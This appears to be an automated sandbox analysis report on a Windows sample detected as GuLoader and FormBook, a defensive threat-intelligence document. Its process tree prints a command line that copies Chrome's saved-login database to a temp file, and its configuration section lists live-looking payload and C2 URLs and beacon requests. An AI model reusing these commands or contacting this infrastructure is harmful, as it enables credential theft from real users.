Loading ...

Play interactive tourEdit tour

Windows Analysis Report Zr26f1rL6r.exe

Overview

General Information

Sample Name:Zr26f1rL6r.exe
Analysis ID:528518
MD5:812181df251e06433bf2f4f6a0c0f0f4
SHA1:aa38a567ee48483d98966622fd320c791bc45871
SHA256:4d6c910a379d00f329e55ad98a7817de0370695566443a74a9a02c85d2463a9d
Infos:

Most interesting Screenshot:

Detection

GuLoader FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Generic Dropper
Multi AV Scanner detection for submitted file
Yara detected FormBook
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
GuLoader behavior detected
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Hides threads from debuggers
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Writes to foreign memory regions
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Sigma detected: Suspicious Rundll32 Without Any CommandLine Params
Tries to resolve many domain names, but no domain seems valid
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Enables debug privileges
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
PE / OLE file has an invalid certificate
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • Zr26f1rL6r.exe (PID: 6656 cmdline: "C:\Users\user\Desktop\Zr26f1rL6r.exe" MD5: 812181DF251E06433BF2F4F6A0C0F0F4)
    • Zr26f1rL6r.exe (PID: 6600 cmdline: "C:\Users\user\Desktop\Zr26f1rL6r.exe" MD5: 812181DF251E06433BF2F4F6A0C0F0F4)
      • explorer.exe (PID: 4644 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
        • rundll32.exe (PID: 4624 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: 889B99C52A60DD49227C5E485A016679)
          • cmd.exe (PID: 5276 cmdline: /c del "C:\Users\user\Desktop\Zr26f1rL6r.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • cmd.exe (PID: 4808 cmdline: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 4948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • firefox.exe (PID: 5640 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
        • c8ahotgz8h.exe (PID: 5500 cmdline: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe MD5: 812181DF251E06433BF2F4F6A0C0F0F4)
          • c8ahotgz8h.exe (PID: 5908 cmdline: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe MD5: 812181DF251E06433BF2F4F6A0C0F0F4)
        • c8ahotgz8h.exe (PID: 7504 cmdline: "C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe" MD5: 812181DF251E06433BF2F4F6A0C0F0F4)
          • c8ahotgz8h.exe (PID: 2508 cmdline: "C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe" MD5: 812181DF251E06433BF2F4F6A0C0F0F4)
        • c8ahotgz8h.exe (PID: 6900 cmdline: "C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe" MD5: 812181DF251E06433BF2F4F6A0C0F0F4)
          • c8ahotgz8h.exe (PID: 7388 cmdline: "C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe" MD5: 812181DF251E06433BF2F4F6A0C0F0F4)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://atseasonals.com/GHrtt/bin_k"}

Threatname: FormBook

{"C2 list": ["www.ayudavida.com/n8ds/"], "decoy": ["topwowshopping.store", "helpcloud.xyz", "reliablehomesellers.com", "lopsrental.lease", "luxalbridi.com", "recoverytrivia.com", "apps365.one", "shrywl.com", "ozattaos.xyz", "recruitresumelibrary.com", "receiptpor.xyz", "stylesbykee.com", "dczhd.com", "learncodeing.com", "cmoigus.net", "unitedmetal-saudi.com", "koedayuuki.com", "dif-directory.xyz", "heyvecino.com", "mariforum.com", "mackthetruck.com", "quickcoreohio.com", "wordpresshostingblog.com", "peo-campaign.com", "hsbp.online", "divorcefearfreedom.com", "testwebsite0711.com", "khoashop.com", "32342231.xyz", "inklusion.online", "jobl.space", "maroonday.com", "mummymotors.com", "diamota.com", "effective.store", "theyachtmarkets.com", "braxtynmi.xyz", "photon4energy.com", "dubaicars.online", "growebox.com", "abcjanitorialsolutions.com", "aubzo7o9fm.com", "betallsports247.com", "nphone.tech", "diggingquartz.com", "yghdlhax.xyz", "paulalescanorealestate.com", "chaudharyhamza.com", "jamiecongedo.com", "gdav130.xyz", "dietatrintadias.com", "csenmoga.com", "avto-click.com", "goldcoastdoublelot.com", "blueitsolutions.info", "fatima2021.com", "talkingpoint.tours", "smartam6.xyz", "tvterradafarinha.com", "palmasdelmarcondos.com", "3uwz9mpxk77g.biz", "zzytyzf.top", "writingmomsobitwithmom.com", "littlefishth.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001E.00000000.51287210518.0000000000560000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    0000001B.00000002.51291049340.0000000002320000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      00000019.00000000.50661482100.0000000040097000.00000004.00020000.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
      • 0x37f8:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
      0000000A.00000000.47309959760.0000000000560000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        00000019.00000002.50719644805.0000000040097000.00000004.00020000.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
        • 0x37f8:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
        Click to see the 37 entries

        Sigma Overview

        System Summary:

        barindex
        Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper ArgumentsShow sources
        Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4644, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 4624
        Sigma detected: Suspicious Rundll32 Without Any CommandLine ParamsShow sources
        Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4644, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 4624

        Jbx Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Found malware configurationShow sources
        Source: 0000001E.00000000.51287210518.0000000000560000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://atseasonals.com/GHrtt/bin_k"}
        Source: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.ayudavida.com/n8ds/"], "decoy": ["topwowshopping.store", "helpcloud.xyz", "reliablehomesellers.com", "lopsrental.lease", "luxalbridi.com", "recoverytrivia.com", "apps365.one", "shrywl.com", "ozattaos.xyz", "recruitresumelibrary.com", "receiptpor.xyz", "stylesbykee.com", "dczhd.com", "learncodeing.com", "cmoigus.net", "unitedmetal-saudi.com", "koedayuuki.com", "dif-directory.xyz", "heyvecino.com", "mariforum.com", "mackthetruck.com", "quickcoreohio.com", "wordpresshostingblog.com", "peo-campaign.com", "hsbp.online", "divorcefearfreedom.com", "testwebsite0711.com", "khoashop.com", "32342231.xyz", "inklusion.online", "jobl.space", "maroonday.com", "mummymotors.com", "diamota.com", "effective.store", "theyachtmarkets.com", "braxtynmi.xyz", "photon4energy.com", "dubaicars.online", "growebox.com", "abcjanitorialsolutions.com", "aubzo7o9fm.com", "betallsports247.com", "nphone.tech", "diggingquartz.com", "yghdlhax.xyz", "paulalescanorealestate.com", "chaudharyhamza.com", "jamiecongedo.com", "gdav130.xyz", "dietatrintadias.com", "csenmoga.com", "avto-click.com", "goldcoastdoublelot.com", "blueitsolutions.info", "fatima2021.com", "talkingpoint.tours", "smartam6.xyz", "tvterradafarinha.com", "palmasdelmarcondos.com", "3uwz9mpxk77g.biz", "zzytyzf.top", "writingmomsobitwithmom.com", "littlefishth.com"]}
        Multi AV Scanner detection for submitted fileShow sources
        Source: Zr26f1rL6r.exeVirustotal: Detection: 40%Perma Link
        Source: Zr26f1rL6r.exeReversingLabs: Detection: 20%
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.47948793587.000000001E520000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000000.47834355504.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.47938169208.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.51921251635.0000000000C70000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.51921478226.0000000000CA0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000000.47886932964.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY
        Antivirus detection for URL or domainShow sources
        Source: http://www.jamiecongedo.com/n8ds/?6ldD=BkWPMdYTTR0ZQmtbwmm8ayu+d1W65DpSRIKYH6pwPIESNdIBtEF9Jb3WD/+idhQ1krue&2dfPiT=o6P8yXAvira URL Cloud: Label: malware
        Multi AV Scanner detection for dropped fileShow sources
        Source: C:\Users\user\AppData\Local\Temp\Grt4lhl\c8ahotgz8h.exeReversingLabs: Detection: 20%
        Source: 15.2.rundll32.exe.488796c.4.unpackAvira: Label: TR/Dropper.Gen
        Source: 15.2.rundll32.exe.540a58.0.unpackAvira: Label: TR/Dropper.Gen
        Source: 25.0.firefox.exe.4009796c.0.unpackAvira: Label: TR/Dropper.Gen
        Source: 25.0.firefox.exe.4009796c.1.unpackAvira: Label: TR/Dropper.Gen
        Source: 25.2.firefox.exe.4009796c.0.unpackAvira: Label: TR/Dropper.Gen
        Source: Zr26f1rL6r.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: unknownHTTPS traffic detected: 107.6.148.162:443 -> 192.168.11.20:49812 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 107.6.148.162:443 -> 192.168.11.20:49837 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 107.6.148.162:443 -> 192.168.11.20:49840 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 107.6.148.162:443 -> 192.168.11.20:49841 version: TLS 1.2
        Source: Binary string: wntdll.pdbUGP source: Zr26f1rL6r.exe, 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, rundll32.exe, 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp, rundll32.exe, 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51750821024.000000001E890000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51752294745.000000001E9BD000.00000040.00000001.sdmp
        Source: Binary string: wntdll.pdb source: c8ahotgz8h.exe, c8ahotgz8h.exe, 0000001E.00000002.51750821024.000000001E890000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51752294745.000000001E9BD000.00000040.00000001.sdmp
        Source: Binary string: rundll32.pdb source: Zr26f1rL6r.exe, 0000000A.00000002.47938438528.00000000000D0000.00000040.00020000.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47933760701.00000000008E5000.00000004.00000001.sdmp
        Source: Binary string: rundll32.pdbGCTL source: Zr26f1rL6r.exe, 0000000A.00000002.47938438528.00000000000D0000.00000040.00020000.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47933760701.00000000008E5000.00000004.00000001.sdmp
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0040FA90 FindFirstFileW,FindNextFileW,FindClose,15_2_0040FA90
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0040FA89 FindFirstFileW,FindNextFileW,FindClose,15_2_0040FA89

        Networking:

        barindex
        Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
        Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49815 -> 104.21.76.223:80
        Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49815 -> 104.21.76.223:80
        Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49815 -> 104.21.76.223:80
        Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49817 -> 164.155.212.139:80
        Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49817 -> 164.155.212.139:80
        Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49817 -> 164.155.212.139:80
        Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49818 -> 172.120.157.187:80
        Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49818 -> 172.120.157.187:80
        Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49818 -> 172.120.157.187:80
        Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49819 -> 3.64.163.50:80
        Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49819 -> 3.64.163.50:80
        Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49819 -> 3.64.163.50:80
        Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49823 -> 172.67.164.153:80
        Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49823 -> 172.67.164.153:80
        Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49823 -> 172.67.164.153:80
        Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49824 -> 3.64.163.50:80
        Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49824 -> 3.64.163.50:80
        Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49824 -> 3.64.163.50:80
        Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49826 -> 3.64.163.50:80
        Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49826 -> 3.64.163.50:80
        Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49826 -> 3.64.163.50:80
        Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49836 -> 3.64.163.50:80
        Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49836 -> 3.64.163.50:80
        Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49836 -> 3.64.163.50:80
        Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49843 -> 34.102.136.180:80
        Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49843 -> 34.102.136.180:80
        Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49843 -> 34.102.136.180:80
        System process connects to network (likely due to code injection or exploit)Show sources
        Source: C:\Windows\explorer.exeNetwork Connect: 88.99.22.5 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 172.120.157.187 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 3.64.163.50 80Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 116.62.216.226 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 172.67.164.153 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.25 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 104.21.76.223 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 66.29.140.185 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.144 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 81.2.194.128 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 203.170.80.250 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 164.155.212.139 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 136.143.191.204 80Jump to behavior
        Performs DNS queries to domains with low reputationShow sources
        Source: DNS query: www.braxtynmi.xyz
        Source: DNS query: www.braxtynmi.xyz
        Source: DNS query: www.helpcloud.xyz
        Source: DNS query: www.ozattaos.xyz
        Source: DNS query: www.braxtynmi.xyz
        Source: DNS query: www.braxtynmi.xyz
        Source: DNS query: www.braxtynmi.xyz
        Source: DNS query: www.braxtynmi.xyz
        Source: DNS query: www.braxtynmi.xyz
        C2 URLs / IPs found in malware configurationShow sources
        Source: Malware configuration extractorURLs: https://atseasonals.com/GHrtt/bin_k
        Source: Malware configuration extractorURLs: www.ayudavida.com/n8ds/
        Tries to resolve many domain names, but no domain seems validShow sources
        Source: unknownDNS traffic detected: query: www.tvterradafarinha.com replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: www.aubzo7o9fm.com replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: www.koedayuuki.com replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: www.recoverytrivia.com replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: www.wordpresshostingblog.com replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: www.abcjanitorialsolutions.com replaycode: Server failure (2)
        Source: unknownDNS traffic detected: query: www.recruitresumelibrary.com replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: www.testwebsite0711.com replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: www.diamota.com replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: www.braxtynmi.xyz replaycode: Server failure (2)
        Source: unknownDNS traffic detected: query: www.learncodeing.com replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: www.3uwz9mpxk77g.biz replaycode: Server failure (2)
        Source: unknownDNS traffic detected: query: www.photon4energy.com replaycode: Name error (3)
        Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
        Source: Joe Sandbox ViewASN Name: EGIHOSTINGUS EGIHOSTINGUS
        Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: global trafficHTTP traffic detected: GET /n8ds/?6ldD=WOFmZk82z8UpNC4mY/AvD/Zy3C9NxlTUz/ym6JpmI0LbMg439xvRHQoxZAlOCyCIZ92f&v6Mt=3fxxA4Z HTTP/1.1Host: www.topwowshopping.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?6ldD=c2GcPcxTJCn2LTXtZlkaUw2pSxcw64fMJrFLz4vK/kX5/sVAgoQGq8HC2c+bDUK23KGm&v6Mt=3fxxA4Z HTTP/1.1Host: www.growebox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?6ldD=XGdb25Y748Ut0VrvAGrAV9TZskQ8Vhp7eMrkuH6lQS7YMNVmEhdbMrp7c3mVg154ue/4&v6Mt=3fxxA4Z HTTP/1.1Host: www.ayudavida.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?6ldD=QiVr4NomMTfDVQzLAZiPy17hhsXauZOjQhEkIhfcDYRSe01pzyB5iClqESLJZee3iuRd&v6Mt=3fxxA4Z HTTP/1.1Host: www.stylesbykee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&v6Mt=3fxxA4Z HTTP/1.1Host: www.inklusion.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?6ldD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&v6Mt=3fxxA4Z HTTP/1.1Host: www.mackthetruck.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?6ldD=4vxveAhDLD1bBBVBYGklTAgHIjczf9yiSG6BwPp//N0BMhpP0xQNoBxeqzaksixrbhTl&5jp=eZ4Pez HTTP/1.1Host: www.helpcloud.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?6ldD=n1UrTr6j/bQFz4e4Cp8BbMP0v/KiHdXZ9JkrSrs2y278xAws0T3fM8y5E13MJVyQk50j&5jp=eZ4Pez HTTP/1.1Host: www.ozattaos.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&5jp=eZ4Pez HTTP/1.1Host: www.inklusion.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?6ldD=diws0RRfDxwvVlRuoC4BJCkr8rc2YRL+Z6kcdn/HANybL0ntvNIGnh8uTRYHcPOHwusF&5jp=eZ4Pez HTTP/1.1Host: www.unitedmetal-saudi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&v6Mt=3fxxA4Z HTTP/1.1Host: www.inklusion.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?6ldD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&v6Mt=3fxxA4Z HTTP/1.1Host: www.mackthetruck.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?2dfPiT=o6P8yX&6ldD=xlQ0Win+OWEEdOu7BqbL/FEFl5i/i6MXL9UXMpB5xFgkztpNPhPNR2/8wQo9B3jWcPv9 HTTP/1.1Host: www.divorcefearfreedom.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?6ldD=BkWPMdYTTR0ZQmtbwmm8ayu+d1W65DpSRIKYH6pwPIESNdIBtEF9Jb3WD/+idhQ1krue&2dfPiT=o6P8yX HTTP/1.1Host: www.jamiecongedo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?6ldD=nk91cKg8qOwhKsLnO/dUua/naUDhyNO+v5raVsad7WuGJwv5YN6kPTcjqATZ67dmN8K4&v6Mt=3fxxA4Z HTTP/1.1Host: www.lopsrental.leaseConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&v6Mt=3fxxA4Z HTTP/1.1Host: www.inklusion.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?6ldD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&v6Mt=3fxxA4Z HTTP/1.1Host: www.mackthetruck.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: Joe Sandbox ViewIP Address: 3.64.163.50 3.64.163.50
        Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
        Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Nov 2021 11:56:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecache-control: no-cache, no-store, must-revalidate,post-check=0,pre-check=0expires: 0last-modified: Thu, 25 Nov 2021 11:56:13 GMTpragma: no-cachevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wftVfpJA1zZJwjRaaheNSQN%2B47kW8NUpVPnztY9X9CDRJcJK3cSrWrr%2Fkh12oU%2BPDjaHHxgPOGqNMJdKZBB2VmnTOlRI%2FV3g8s4dK2XbZbitRDqmmAxJtUHBGjKUUJ1RfXt9WyadqG7lXv0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6b3ab146a9874e37-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a Data Ascii: d404 Not Found
